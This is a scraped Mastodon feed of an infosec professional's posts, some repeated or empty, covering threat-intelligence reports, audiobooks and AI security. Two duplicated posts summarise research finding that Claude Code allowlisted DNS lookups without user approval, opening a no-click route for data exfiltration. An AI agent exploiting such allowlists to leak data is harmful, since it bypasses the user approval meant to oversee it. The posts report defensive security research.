Ian Campbell π΄
@neurovagrant@masto.deoan.org
dying laughing here:
https://github.com/google-gemini/gemini-cli/issues/16750
Ian Campbell π΄@neurovagrant@masto.deoan.org
Ian Campbell π΄@neurovagrant@masto.deoan.org
Ian Campbell π΄@neurovagrant@masto.deoan.org
For my friends out there on the job hunt.
Ian Campbell π΄@neurovagrant@masto.deoan.org
New research out from @DomainTools@infosec.exchange Investigations today!
We took time to pull apart the "Charming Kitten" data dump and analyze it accordingly.
Always fascinating to me how different the threat actor groups can be both domestically and regionally. In APT35's case, much more militarily regimented, versus hybrid "state startup waterfall" or "criminal-state merge blend" setups.
#infosec #cybersecurity #threatintel
https://dti.domaintools.com/threat-intelligence-report-apt35-internal-leak-of-hacking-campaigns-against-lebanon-kuwait-turkey-saudi-arabia-korea-and-domestic-iranian-targets/
Ian Campbell π΄@neurovagrant@masto.deoan.org
Audiobooks are a 100% valid way of reading, and if it's your primary way, I hear & honor ya.
Your irregular reminder that if you enjoy audiobooks Libro.fm is an incredibly good replacement for Audible.
Libro.fm provides DRM-free downloadable MP3 versions of the book (in addition to having an app you can use). They've had at least 90% of the books I've looked for.
They're also an employee-owned social corporation that allows you to support local independent bookstores with your purchases.
Ian Campbell π΄@neurovagrant@masto.deoan.org
i mean who could've expected a yearslong, deeply researched, regularly used method of data exfiltration COULD BE ABUSED BY REMOVING NECESSARY USER INTERACTION
Ian Campbell π΄@neurovagrant@masto.deoan.org
me trying to be less adversarial towards AI and then they specifically enable noclick DNS exfil
Ian Campbell π΄@neurovagrant@masto.deoan.org
This is some really smart digging: realizing that Claude Code does not require user interaction for certain bash commands, they discovered that DNS lookups were specifically allowlisted, clearing a trivial path for well-known DNS exfiltration methods.
So when I say βall these implementations are ignoring years and decades of lessons learned the hard wayβ itβs not hyperbole. Anthropic 100% cleared the path for DNS exfil here.
h/t to @cR0w@infosec.exchange - thank you!
#infosec #genai
https://embracethered.com/blog/posts/2025/claude-code-exfiltration-via-dns-requests/
Ian Campbell π΄@neurovagrant@masto.deoan.org
i mean who could've expected a yearslong, deeply researched, regularly used method of data exfiltration COULD BE ABUSED BY REMOVING NECESSARY USER INTERACTION
Ian Campbell π΄@neurovagrant@masto.deoan.org
This is some really smart digging: realizing that Claude Code does not require user interaction for certain bash commands, they discovered that DNS lookups were specifically allowlisted, clearing a trivial path for well-known DNS exfiltration methods.
So when I say βall these implementations are ignoring years and decades of lessons learned the hard wayβ itβs not hyperbole. Anthropic 100% cleared the path for DNS exfil here.
h/t to @cR0w@infosec.exchange - thank you!
#infosec #genai
https://embracethered.com/blog/posts/2025/claude-code-exfiltration-via-dns-requests/
Ian Campbell π΄@neurovagrant@masto.deoan.org
Hey! I know those guys!! Great conversation between two of the best leaders I've ever worked under. When you hear @danonsecurity@infosec.exchange talk about his love of and approach to community, you'll see why I'm ride-or-die.
And having been on 12-24hr bridge calls with both he and @bapril@infosec.exchange when the crap hit the fan, as well as having come to them both to take responsibility for mistakes or errors in judgment, I can vouch that they both walk the walk covered here.
#infosec
https://youtu.be/yuryI513s2M
Ian Campbell π΄@neurovagrant@masto.deoan.org
Ian Campbell π΄@neurovagrant@masto.deoan.org
Ian Campbell π΄@neurovagrant@masto.deoan.org
Ian Campbell π΄@neurovagrant@masto.deoan.org